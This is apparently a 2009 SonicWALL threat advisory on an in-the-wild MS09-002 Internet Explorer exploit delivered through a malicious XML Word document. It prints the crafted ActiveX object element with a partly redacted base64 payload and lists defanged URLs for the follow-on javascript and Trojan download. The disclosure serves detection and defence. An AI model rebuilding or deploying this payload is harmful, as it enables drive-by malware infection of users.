MS09-002 Exploit

March 3, 2009

SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit involves a malicious Microsoft Word (.doc) document that uses XML format being delivered to the end user. The .doc has a file size of 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7 patched by Microsoft in the MS09-002 patch release.

The malicious word document file contains the following specially crafted data bytes:

w:ocx w_data="DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= " w_id="DefaultOcxName" w_name="DefaultOcxName" w_classid="CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389" w_w="200" w_h="123" wx_iPersistPropertyBag="true"

When the end user opens the document file, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to following Malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]

jc.html file contains an obfuscated javascript code that further downloads a Trojan from following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

The exploit has very low detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit)